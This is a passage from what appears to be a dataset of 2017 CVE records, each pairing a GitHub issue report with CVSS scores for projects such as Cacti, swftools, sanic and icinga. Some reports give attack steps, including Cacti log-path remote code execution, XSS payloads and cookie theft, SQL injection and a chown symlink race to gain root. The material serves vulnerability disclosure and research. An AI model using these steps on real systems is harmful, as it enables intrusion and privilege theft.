  10473. "description": "Local File Read and RCE in Cacti NUMBERTAG ds NUMBERTAG It requires admin privileges to reproduce the ploblem. After we login in with default account APITAG Local File Read NUMBERTAG Click Settings APITAG URLTAG URLTAG ,modify Cacti Log Path into APITAG NUMBERTAG isit URLTAG URLTAG , and you'll get the content of APITAG RCE NUMBERTAG Click Settings APITAG URLTAG URLTAG ,modify Cacti Log Path into Web Path like APITAG NUMBERTAG isit FILETAG and set http header APITAG into APITAG . Or exec cmd APITAG . The evil php code will been writen to PATHTAG",
  10474. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  10475. "severity": "HIGH",
  10476. "baseScore": 7.2,
  10477. "impactScore": 5.9,
  10478. "exploitabilityScore": 1.2
  10479. },
  10480. {
  10481. "CVE_ID": "CVE-2017-16663",
  10482. "Issue_Url_old": "https://github.com/pts/sam2p/issues/16",
  10483. "Issue_Url_new": "https://github.com/pts/sam2p/issues/16",
  10484. "Repo_new": "pts/sam2p",
  10485. "Issue_Created_At": "2017-11-07T13:56:06Z",
  10486. "description": "Integer Overflow in input bmp.ci. I found an integer overflow bug in input bmp.ci. in function APITAG URLTAG width height NUMBERTAG sizeof (unsigned char) would integer overflow there are NUMBERTAG places hace this problem: URLTAG URLTAG URLTAG here are the pocs which could crash sam2p: URLTAG URLTAG and screenshot for ASAN: URLTAG URLTAG patch method: check width height NUMBERTAG sizeof (unsigned char) before calc it",
  10487. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10488. "severity": "MEDIUM",
  10489. "baseScore": 5.5,
  10490. "impactScore": 3.6,
  10491. "exploitabilityScore": 1.8
  10492. },
  10493. {
  10494. "CVE_ID": "CVE-2017-16667",
  10495. "Issue_Url_old": "https://github.com/bit-team/backintime/issues/834",
  10496. "Issue_Url_new": "https://github.com/bit-team/backintime/issues/834",
  10497. "Repo_new": "bit-team/backintime",
  10498. "Issue_Created_At": "2017-11-07T18:22:38Z",
  10499. "description": "Some 'notify send' arguments (filepath in errors/warnings) are treated as shell arguments. Backintime NUMBERTAG APITAG stable) Hi, this is a bug I noticed when trying to backup a file my user didn't have read permissions on. Normally a desktop notification ( FILETAG would be displayed containing the path of the problematic file. However in some cases, parts of the log message are treated as shell commands. For example ERRORTAG Other errors also trigger this bug (example with a filesystem error:) ERRORTAG",
  10500. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  10501. "severity": "HIGH",
  10502. "baseScore": 7.8,
  10503. "impactScore": 5.9,
  10504. "exploitabilityScore": 1.8
  10505. },
  10506. {
  10507. "CVE_ID": "CVE-2017-16711",
  10508. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/46",
  10509. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/46",
  10510. "Repo_new": "matthiaskramm/swftools",
  10511. "Issue_Created_At": "2017-11-09T12:44:31Z",
  10512. "description": "A null pointer dereference bug of swfrender. A null pointer dereference bug of swfrender poc: URLTAG asan: URLTAG the problem is in the function uncompress URLTAG when function uncompress failed, this function will return NUMBERTAG URLTAG so the APITAG will return NUMBERTAG URLTAG data will be a NULL when construct it. void data = APITAG &width, &height); After that, gfximage_new will make a new struct in which the data is a NULL pointer. it caused a NULL pointer reference when calling fill_line_bitmap URLTAG",
  10513. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10514. "severity": "MEDIUM",
  10515. "baseScore": 5.5,
  10516. "impactScore": 3.6,
  10517. "exploitabilityScore": 1.8
  10518. },
  10519. {
  10520. "CVE_ID": "CVE-2017-16762",
  10521. "Issue_Url_old": "https://github.com/channelcat/sanic/issues/633",
  10522. "Issue_Url_new": "https://github.com/sanic-org/sanic/issues/633",
  10523. "Repo_new": "sanic-org/sanic",
  10524. "Issue_Created_At": "2017-04-13T18:16:26Z",
  10525. "description": "static file register arbitrary file read. File APITAG line NUMBERTAG we can see here is security check CODETAG but at the line NUMBERTAG in this file,the unquote function decoded file_path ERRORTAG we only need to \"/\" url coding can bypass the previous security check like this: FILETAG example of vulnerabilities: CODETAG",
  10526. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  10527. "severity": "HIGH",
  10528. "baseScore": 7.5,
  10529. "impactScore": 3.6,
  10530. "exploitabilityScore": 3.9
  10531. },
  10532. {
  10533. "CVE_ID": "CVE-2017-16763",
  10534. "Issue_Url_old": "https://github.com/bbengfort/confire/issues/24",
  10535. "Issue_Url_new": "https://github.com/bbengfort/confire/issues/24",
  10536. "Repo_new": "bbengfort/confire",
  10537. "Issue_Created_At": "2017-11-10T01:52:48Z",
  10538. "description": "APITAG method in class Configuration is vulnerable. class APITAG mysetting = True logpath = PATHTAG appname = APITAG settings = APITAG CONF_PATHS = [ PATHTAG The global configuration APITAG User specific configuration APITAG Local directory configuration ] PATHTAG APITAG Hi, there is a vulnerability in APITAG method in config.py, please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
  10539. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10540. "severity": "CRITICAL",
  10541. "baseScore": 9.8,
  10542. "impactScore": 5.9,
  10543. "exploitabilityScore": 3.9
  10544. },
  10545. {
  10546. "CVE_ID": "CVE-2017-16764",
  10547. "Issue_Url_old": "https://github.com/illagrenan/django-make-app/issues/5",
  10548. "Issue_Url_new": "https://github.com/illagrenan/django-make-app/issues/5",
  10549. "Repo_new": "illagrenan/django-make-app",
  10550. "Issue_Created_At": "2017-11-10T02:25:54Z",
  10551. "description": "read_yaml_file method is vulnerable. from APITAG import read_yaml_file yaml_raw_data = APITAG PATHTAG APITAG Hi, there is a vulnerability in read_yaml_file methods in io_utils.py, please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
  10552. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10553. "severity": "CRITICAL",
  10554. "baseScore": 9.8,
  10555. "impactScore": 5.9,
  10556. "exploitabilityScore": 3.9
  10557. },
  10558. {
  10559. "CVE_ID": "CVE-2017-16785",
  10560. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/1071",
  10561. "Issue_Url_new": "https://github.com/cacti/cacti/issues/1071",
  10562. "Repo_new": "cacti/cacti",
  10563. "Issue_Created_At": "2017-11-10T11:22:40Z",
  10564. "description": "Reflected XSS in NUMBERTAG We (worlak2 and cibvetr2) found Reflected XSS vuln in last version APITAG example we found in Google host with last version of cacti) APITAG NUMBERTAG URLTAG",
  10565. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  10566. "severity": "MEDIUM",
  10567. "baseScore": 6.1,
  10568. "impactScore": 2.7,
  10569. "exploitabilityScore": 2.8
  10570. },
  10571. {
  10572. "CVE_ID": "CVE-2017-16793",
  10573. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/47",
  10574. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/47",
  10575. "Repo_new": "matthiaskramm/swftools",
  10576. "Issue_Created_At": "2017-11-10T13:04:12Z",
  10577. "description": "A heapoverflow bug of wa NUMBERTAG swf.. A heapoverflow bug of wa NUMBERTAG swf. poc: URLTAG asan: URLTAG Bug occured in file APITAG Function wav_convert2mono does not check the size and align in wav sample properly, which causes samplelen equal to NUMBERTAG while size less than align. URLTAG Thus, the argument to the function malloc will less than we expect, which is only NUMBERTAG bytes. URLTAG Later, in the for loop, it will cause heap buffer overflow. Here the varible src >size is NUMBERTAG b NUMBERTAG a, which makes pos2 much more larger than NUMBERTAG URLTAG Patch Suggestion: Check size and align.",
  10578. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  10579. "severity": "HIGH",
  10580. "baseScore": 7.8,
  10581. "impactScore": 5.9,
  10582. "exploitabilityScore": 1.8
  10583. },
  10584. {
  10585. "CVE_ID": "CVE-2017-16794",
  10586. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/50",
  10587. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/50",
  10588. "Repo_new": "matthiaskramm/swftools",
  10589. "Issue_Created_At": "2017-11-10T16:22:47Z",
  10590. "description": "A heapoverflow bug of png2swf.. A heapoverflow bug of png2swf. poc: URLTAG asan: URLTAG png_read_header parameter a is a char type, and header >bpp is an int type when a is NUMBERTAG the header >app will become NUMBERTAG ffffff NUMBERTAG by the evaluate operation URLTAG when using bpp, the pos will become a really big number, which caused the heap overflow URLTAG",
  10591. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10592. "severity": "MEDIUM",
  10593. "baseScore": 5.5,
  10594. "impactScore": 3.6,
  10595. "exploitabilityScore": 1.8
  10596. },
  10597. {
  10598. "CVE_ID": "CVE-2017-16796",
  10599. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/51",
  10600. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/51",
  10601. "Repo_new": "matthiaskramm/swftools",
  10602. "Issue_Created_At": "2017-11-12T09:09:05Z",
  10603. "description": "3 bugs of png2swf. bug NUMBERTAG atribute write caused by a logic bug In function png_load, there is no check for realoc. If the result of realloc is NUMBERTAG the data will be written into address zimagedatalen. We could control the value of zimagedatalen to achieve atribute write. URLTAG URLTAG bug NUMBERTAG crash caused by a logic bug In fuction png_read_chunk, there is no check for malloc. If malloc failed, destdata NUMBERTAG fread will write address NUMBERTAG and crash the binary. URLTAG URLTAG bug NUMBERTAG integer overflow > heapoverflow In function png_load, both header,width and APITAG are NUMBERTAG bytes, and alleclen NUMBERTAG is NUMBERTAG bytes. header,width APITAG NUMBERTAG may be greater than NUMBERTAG bytes, which caused integer overflow. Further can cause heap overflow. URLTAG",
  10604. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  10605. "severity": "HIGH",
  10606. "baseScore": 7.8,
  10607. "impactScore": 5.9,
  10608. "exploitabilityScore": 1.8
  10609. },
  10610. {
  10611. "CVE_ID": "CVE-2017-16801",
  10612. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/3915",
  10613. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/3915",
  10614. "Repo_new": "octopusdeploy/issues",
  10615. "Issue_Created_At": "2017-11-13T03:07:06Z",
  10616. "description": "Step Template Name XSS Vulnerability. There is a XSS vulnerability in the step template name, when either importing or adding a custom step template. Refer to: URLTAG Also see: URLTAG",
  10617. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  10618. "severity": "MEDIUM",
  10619. "baseScore": 5.4,
  10620. "impactScore": 2.7,
  10621. "exploitabilityScore": 2.3
  10622. },
  10623. {
  10624. "CVE_ID": "CVE-2017-16805",
  10625. "Issue_Url_old": "https://github.com/radare/radare2/issues/8813",
  10626. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/8813",
  10627. "Repo_new": "radareorg/radare2",
  10628. "Issue_Created_At": "2017-11-08T20:34:24Z",
  10629. "description": "Invalid read in APITAG Invalid read in APITAG Git HEAD: APITAG Crashing testcase in URLTAG Command: APITAG ASAN: ERRORTAG",
  10630. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10631. "severity": "MEDIUM",
  10632. "baseScore": 5.5,
  10633. "impactScore": 3.6,
  10634. "exploitabilityScore": 1.8
  10635. },
  10636. {
  10637. "CVE_ID": "CVE-2017-16808",
  10638. "Issue_Url_old": "https://github.com/the-tcpdump-group/tcpdump/issues/645",
  10639. "Issue_Url_new": "https://github.com/the-tcpdump-group/tcpdump/issues/645",
  10640. "Repo_new": "the-tcpdump-group/tcpdump",
  10641. "Issue_Created_At": "2017-11-12T19:13:50Z",
  10642. "description": "Heap Overread triggered by sending specific packets over a interface being monitored by APITAG as well as while trying to parse the pcap file of these packets. There seems to be a heap based buffer overread while running tcpdump on a crafted pcap file. A similar behavior is seen when tcpdump is listening on an interface and the contents of this file is relayed over the network. In order to trigger the vulnerability, run APITAG The relevant APITAG output: The memcheck output has been attached because it was too long. _memcheck APITAG FILETAG Debug info: Tcpdump version: APITAG Libcap version: libpcap NUMBERTAG OS: Ubuntu NUMBERTAG Compiler: gcc NUMBERTAG Target NUMBERTAG linux gnu Hexdump of Input: CODETAG I performed some analysis with gdb to identify what was causing the issue. On adding a breakpoint in main and the function ether_print using: CODETAG GDB gave the following output: ERRORTAG Values after code execution APITAG When the breakpoint reaches the second time. APITAG ep has no values, and the fetching fails on APITAG CODETAG Looks like a heap overread is happening resulting in NULL or garbage values. Note that running Tcpdump without Memcheck doesn\u2019t result in a crash: APITAG : ERRORTAG Valgrind Network Output : The network memcheck output has been attached because it was too long. _memcheck APITAG FILETAG Credits for discovering the potential memory error goes to MENTIONTAG I performed the analysis and designed the POC for tcpdump on both the pcap file as well as on the network. PS Sorry for the long ish bug report.",
  10643. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10644. "severity": "MEDIUM",
  10645. "baseScore": 5.5,
  10646. "impactScore": 3.6,
  10647. "exploitabilityScore": 1.8
  10648. },
  10649. {
  10650. "CVE_ID": "CVE-2017-16810",
  10651. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/3919",
  10652. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/3919",
  10653. "Repo_new": "octopusdeploy/issues",
  10654. "Issue_Created_At": "2017-11-14T00:28:58Z",
  10655. "description": "XSS vulnerability in the All Variables tab. See URLTAG source: URLTAG Steps to recreate NUMBERTAG Create a new variable set NUMBERTAG Put your XSS payload in the name of the variable set, for example: ERRORTAG FILETAG NUMBERTAG Add a variable to your variable set, can be anything you want FILETAG NUMBERTAG Add your variable set to an existing or new project FILETAG NUMBERTAG iew APITAG Variables\" on your project FILETAG NUMBERTAG SS payload fires repeatedly",
  10656. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  10657. "severity": "MEDIUM",
  10658. "baseScore": 5.4,
  10659. "impactScore": 2.7,
  10660. "exploitabilityScore": 2.3
  10661. },
  10662. {
  10663. "CVE_ID": "CVE-2017-16820",
  10664. "Issue_Url_old": "https://github.com/collectd/collectd/issues/2291",
  10665. "Issue_Url_new": "https://github.com/collectd/collectd/issues/2291",
  10666. "Repo_new": "collectd/collectd",
  10667. "Issue_Created_At": "2017-05-18T22:56:47Z",
  10668. "description": "SNMP table . Version of collectd NUMBERTAG bpo NUMBERTAG from debian jessie backports repo Operating system / distribution: debian NUMBERTAG jessie Expected behavior I am polling connected clients across about NUMBERTAG ubiquiti access points from the SNMP Station table. A few of the Access points have NUMBERTAG clients, and therefore return nothing. If the instance string returns nothing it should gracefully log(optional) and move on to the next task. Actual behavior After much testing I narrowed it down to a single access point which I realized had no clients attached. With only that client configured I get the double free or corruption error. collectd T Error in `collectd': double free or corruption (!pre NUMBERTAG dd NUMBERTAG Aborted If the instance OID returns no data it dies here. Configs to reproduce my_types.db >ubnt_rm5_sta signal:GAUGE:U:U, noisefloor:GAUGE:U:U, ccq:GAUGE:U:U, amq:GAUGE:U:U, amc:GAUGE:U:U snmp APITAG APITAG snmp> > APITAG \"stations\"> > Type \"ubnt_rm5_sta\" > Table true > Instance APITAG > Values APITAG APITAG APITAG APITAG APITAG > APITAG > > APITAG \"ubnt rm5 allstate N NUMBERTAG Address APITAG > Version NUMBERTAG Community \"public\" > Collect \"stations\" > APITAG > APITAG Extra info from the mib for what I'm polling. >snmptranslate m PATHTAG Tz | grep APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Let me know if you need any more information.",
  10669. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  10670. "severity": "CRITICAL",
  10671. "baseScore": 9.8,
  10672. "impactScore": 5.9,
  10673. "exploitabilityScore": 3.9
  10674. },
  10675. {
  10676. "CVE_ID": "CVE-2017-16821",
  10677. "Issue_Url_old": "https://github.com/b3log/symphony/issues/503",
  10678. "Issue_Url_new": "https://github.com/b3log/symphony/issues/503",
  10679. "Repo_new": "b3log/symphony",
  10680. "Issue_Created_At": "2017-11-14T15:44:01Z",
  10681. "description": "Cross Site Scripting vulnerability in user center. Hi,man.I found a Cross Site Scripting vulnerability in user center First ,my test environment OS : APITAG NUMBERTAG Browser : APITAG Data : APITAG NUMBERTAG PM Second ,vulnerability details I built a program with symphony. Location : PATHTAG userid Exploit Method : APITAG a account APITAG IP(symphony is based on X Forwarded For to get the IP),so i can change the content of the HTTP Headers X Forwarded APITAG content is xss payload APITAG . APITAG APITAG to your account based on the above steps NUMBERTAG If admin edit your user APITAG is triggered NUMBERTAG Administrator perspective : APITAG Xss payload alert : APITAG Third,others This vulnerability can get Administrator's APITAG can be imagined. Vulnerability Reporter : vulkey(mstsec)",
  10682. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  10683. "severity": "MEDIUM",
  10684. "baseScore": 5.4,
  10685. "impactScore": 2.7,
  10686. "exploitabilityScore": 2.3
  10687. },
  10688. {
  10689. "CVE_ID": "CVE-2017-16834",
  10690. "Issue_Url_old": "https://github.com/lingej/pnp4nagios/issues/140",
  10691. "Issue_Url_new": "https://github.com/lingej/pnp4nagios/issues/140",
  10692. "Repo_new": "lingej/pnp4nagios",
  10693. "Issue_Created_At": "2017-11-02T17:20:33Z",
  10694. "description": "Root privilege escalation via insecure config permissions. I think pnp4nagios has the same problem as nagios core: URLTAG Since the same sort of APITAG are used, we wind up with e.g. APITAG and in particular APITAG owned by the \"nagios\" (or \"icinga\", or whatever) user. However, the contents of APITAG are sensitive: if the \"nagios\" user can edit them, he can remove, APITAG and set APITAG Afterwards, anything he can make npcd do, will be done as root. The fix is probably the same: I think everything under APITAG should be owned by root instead of by the nagios user/group. I'm not a pnp4nagios expert, though, so there may be problems with that approach that I'm unaware of. What happens if we just drop APITAG ?",
  10695. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  10696. "severity": "HIGH",
  10697. "baseScore": 7.8,
  10698. "impactScore": 5.9,
  10699. "exploitabilityScore": 1.8
  10700. },
  10701. {
  10702. "CVE_ID": "CVE-2017-16868",
  10703. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/52",
  10704. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/52",
  10705. "Repo_new": "matthiaskramm/swftools",
  10706. "Issue_Created_At": "2017-11-13T00:08:03Z",
  10707. "description": "An integer overflow bug of wa NUMBERTAG swf. URLTAG when malloc. there is an integer overflow bug: (samplelen ratio NUMBERTAG that make the malloc failed. so samples is NUMBERTAG URLTAG when memcpy use samples\uff0cit cause a null pointer dereference bug memcpy(samples2, samples, numsamples sizeof(U NUMBERTAG",
  10708. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10709. "severity": "MEDIUM",
  10710. "baseScore": 5.5,
  10711. "impactScore": 3.6,
  10712. "exploitabilityScore": 1.8
  10713. },
  10714. {
  10715. "CVE_ID": "CVE-2017-16869",
  10716. "Issue_Url_old": "https://github.com/upx/upx/issues/146",
  10717. "Issue_Url_new": "https://github.com/upx/upx/issues/146",
  10718. "Repo_new": "upx/upx",
  10719. "Issue_Created_At": "2017-11-15T06:23:41Z",
  10720. "description": "SIGSEGV checking corrupted Mach O file APITAG APITAG What's the problem (or question)? SIGSEGV in upx when packing the segfault macho input file in the attached FILETAG . APITAG APITAG (this NUMBERTAG b NUMBERTAG at APITAG NUMBERTAG if (lc_seg == segptr >cmd) { Accessing illegal memory in register rdx. What should have happened? Program received signal SIGSEGV, Segmentation fault. Do you have an idea for a solution? How can we reproduce the issue NUMBERTAG upx segfault macho NUMBERTAG Please tell us details about your environment. UPX version used ( APITAG ): up NUMBERTAG git NUMBERTAG a NUMBERTAG d9b NUMBERTAG UCL data compression library NUMBERTAG zlib data compression library NUMBERTAG LZMA SDK version NUMBERTAG Host Operating System and version: Ubuntu NUMBERTAG linu NUMBERTAG Host CPU architecture NUMBERTAG Target Operating System and version: Mac OS Target CPU architecture NUMBERTAG",
  10721. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  10722. "severity": "HIGH",
  10723. "baseScore": 7.8,
  10724. "impactScore": 5.9,
  10725. "exploitabilityScore": 1.8
  10726. },
  10727. {
  10728. "CVE_ID": "CVE-2017-16881",
  10729. "Issue_Url_old": "https://github.com/b3log/symphony/issues/504",
  10730. "Issue_Url_new": "https://github.com/b3log/symphony/issues/504",
  10731. "Repo_new": "b3log/symphony",
  10732. "Issue_Created_At": "2017-11-18T09:01:37Z",
  10733. "description": "Account avatar link exists XSS vulnerability too.. Hi,man.I hope you can learn by analogy. You filtered xss vulnerability in user APITAG just one place. There is a xss vul in account avatar link. I can enter xss payload APITAG at the avatar link. My test environment OS : APITAG NUMBERTAG Browser : APITAG Tool : APITAG Data : APITAG NUMBERTAG PM Vulnerability details Location : /settings/avatar I setting my avatar,use APITAG capture some HTTP Requests packets: APITAG Analysis packets First packet info: Mthod : POST URI : /upload Content : I uploaded the picture content Second packet info: Mthod : POST URI : /settings/avatar Content : JSON Requests > APITAG When I analyzed the second packet, I knew the process of uploading the avatar. So,i just need to tested the second packet.I changed the value of the JSON parameter APITAG to xss payload APITAG . APITAG Attack When person look my avatar, I can get their cookies. APITAG Come on, my good friend.",
  10734. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  10735. "severity": "MEDIUM",
  10736. "baseScore": 6.1,
  10737. "impactScore": 2.7,
  10738. "exploitabilityScore": 2.8
  10739. },
  10740. {
  10741. "CVE_ID": "CVE-2017-16882",
  10742. "Issue_Url_old": "https://github.com/Icinga/icinga-core/issues/1601",
  10743. "Issue_Url_new": "https://github.com/icinga/icinga-core/issues/1601",
  10744. "Repo_new": "icinga/icinga-core",
  10745. "Issue_Created_At": "2017-11-18T01:03:42Z",
  10746. "description": "Root privilege escalation via insecure permissions. Hello, Unfortunately icinga core has the same problem with its installed permissions that nagios core has, reported in URLTAG The following executables are installed owned by the _icinga_ user: APITAG APITAG APITAG APITAG and likewise with the config files at least the following are vulnerable: APITAG APITAG (yeah, it's a sample, but better safe than sorry) The executables are exploitable because _icinga_ can edit them and _root_ will run them; the configs are vulnerable because _icinga_ can edit them to give the daemons instructions and then insist that those daemons run as _root_. The good news for you, potentially, is that maybe you don't care about maintaining compatibility with Nagios XI, and can set APITAG to APITAG . My personal instinct would be to drop the APITAG all around, and then give the icinga user write permission only on those directories it needs. If somebody wants to manage the configs other than icinga.cfg with a dedicated, non _icinga_ group then he could do that either on his own or potentially with a new APITAG flag.",
  10747. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  10748. "severity": "HIGH",
  10749. "baseScore": 7.8,
  10750. "impactScore": 5.9,
  10751. "exploitabilityScore": 1.8
  10752. },
  10753. {
  10754. "CVE_ID": "CVE-2017-16883",
  10755. "Issue_Url_old": "https://github.com/libming/libming/issues/77",
  10756. "Issue_Url_new": "https://github.com/libming/libming/issues/77",
  10757. "Repo_new": "libming/libming",
  10758. "Issue_Created_At": "2017-06-08T16:29:18Z",
  10759. "description": "invalid memory read in APITAG . On libming latest version, an invalid memory read was found in function APITAG . ERRORTAG testcase : URLTAG Credit : APITAG of Venustech",
  10760. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10761. "severity": "MEDIUM",
  10762. "baseScore": 6.5,
  10763. "impactScore": 3.6,
  10764. "exploitabilityScore": 2.8
  10765. },
  10766. {
  10767. "CVE_ID": "CVE-2017-16890",
  10768. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/57",
  10769. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/57",
  10770. "Repo_new": "matthiaskramm/swftools",
  10771. "Issue_Created_At": "2018-07-08T03:37:23Z",
  10772. "description": "divide by zero exception in wav_convert2mono in wav.c. one divide by zero exception in wav_convert2mono in wav.c which allows attacker to cause a denial of service. poc file: FILETAG To reproduce: ./wa NUMBERTAG swf o output $poc APITAG APITAG NUMBERTAG ERROR: APITAG FPE on unknown address NUMBERTAG e NUMBERTAG pc NUMBERTAG e NUMBERTAG bp NUMBERTAG ffea NUMBERTAG e NUMBERTAG sp NUMBERTAG ffea NUMBERTAG aa0 T NUMBERTAG e NUMBERTAG in wav_convert2mono PATHTAG NUMBERTAG ebc NUMBERTAG in main PATHTAG NUMBERTAG f2f0dd NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG c8 in _start ( PATHTAG )",
  10773. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10774. "severity": "MEDIUM",
  10775. "baseScore": 5.5,
  10776. "impactScore": 3.6,
  10777. "exploitabilityScore": 1.8
  10778. },
  10779. {
  10780. "CVE_ID": "CVE-2017-16893",
  10781. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/804",
  10782. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/804",
  10783. "Repo_new": "piwigo/piwigo",
  10784. "Issue_Created_At": "2017-11-20T06:00:15Z",
  10785. "description": "a SQL injection in version NUMBERTAG SQL injection in version NUMBERTAG in FILETAG CODETAG values of the edit_list parameters are not sanitized; these are used to construct a SQL query and retrieve a list of registered users into the application. so post the data FILETAG",
  10786. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  10787. "severity": "MEDIUM",
  10788. "baseScore": 6.5,
  10789. "impactScore": 3.6,
  10790. "exploitabilityScore": 2.8
  10791. },
  10792. {
  10793. "CVE_ID": "CVE-2017-16898",
  10794. "Issue_Url_old": "https://github.com/libming/libming/issues/75",
  10795. "Issue_Url_new": "https://github.com/libming/libming/issues/75",
  10796. "Repo_new": "libming/libming",
  10797. "Issue_Created_At": "2017-06-07T14:59:00Z",
  10798. "description": "global buffer overflow in APITAG On libming latest version, a global buffer overflow was found in function APITAG CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  10799. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  10800. "severity": "MEDIUM",
  10801. "baseScore": 5.5,
  10802. "impactScore": 3.6,
  10803. "exploitabilityScore": 1.8
  10804. },
  10805. {
  10806. "CVE_ID": "CVE-2017-16919",
  10807. "Issue_Url_old": "https://github.com/RamonSilva20/mapos/issues/81",
  10808. "Issue_Url_new": "https://github.com/ramonsilva20/mapos/issues/81",
  10809. "Repo_new": "ramonsilva20/mapos",
  10810. "Issue_Created_At": "2017-11-21T02:00:26Z",
  10811. "description": "Ordens de Servi\u00e7o Stored Cross site Scripting (XSS). Ol\u00e1, gostaria de reportar uma falha de stored cross site scripting na funcionalidade de visualizar clientes. A falha encontra se no campo Descri\u00e7\u00e3o da ordem de servi\u00e7o. Quando um administrador visualiza um cliente que tem ordem de servi\u00e7o em aberto, caso haja c\u00f3digo javascript no campo descri\u00e7\u00e3o dessa ordem de servi\u00e7o, esse c\u00f3digo \u00e9 executado. Para checar at\u00e9 a falha, \u00e9 necess\u00e1rio seguir os passos abaixo NUMBERTAG Registrar um cliente em URLTAG NUMBERTAG Logar com o cliente registrado e adicionar uma ordem de servi\u00e7o, dentro do campo descri\u00e7\u00e3o inserir um javascript qualquer, por exemplo: APITAG alert('xss'); APITAG NUMBERTAG Em seguida logar com o usu\u00e1rio administrador, ir em Clientes e visualizar o novo cliente registrado. O c\u00f3digo inserido no passo NUMBERTAG ser\u00e1 executado.",
  10812. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  10813. "severity": "MEDIUM",
  10814. "baseScore": 5.4,
  10815. "impactScore": 2.7,
  10816. "exploitabilityScore": 2.3
  10817. },
  10818. {
  10819. "CVE_ID": "CVE-2017-16933",
  10820. "Issue_Url_old": "https://github.com/Icinga/icinga2/issues/5793",
  10821. "Issue_Url_new": "https://github.com/icinga/icinga2/issues/5793",
  10822. "Repo_new": "icinga/icinga2",
  10823. "Issue_Created_At": "2017-11-23T01:52:28Z",
  10824. "description": "Root privilege escalation via prepare dirs (init script and systemd service file). The APITAG file calls chown unsafely, leading to a root exploit for the APITAG . The tl;dr is that it's never safe to call chown as root, unless the target and all directories above it are controlled wholly by root. A few uses of chown in APITAG are exploitable; here's an example: CODETAG The first line gives away ownership of the directory containing the APITAG , and the next line calls chown on that file. The exploit is that, after the first line executes, the APITAG can simply replace APITAG with a link (sym _or_ hard) to a root owned file. The call to chown will then change ownership of the link's _target_. That is easily exploitable to gain root, by taking ownership of e.g. APITAG or root's APITAG file. To exploit this the first time the service is started, you need to take advantage of the race condition to create a link before the APITAG test is executed. However, there's a much easier scenario: if the service is started, stopped, and started again (even across reboots, for persistent directories), then the APITAG test will succeed, and call chown on a path that has been controlled by APITAG since the first time the service was 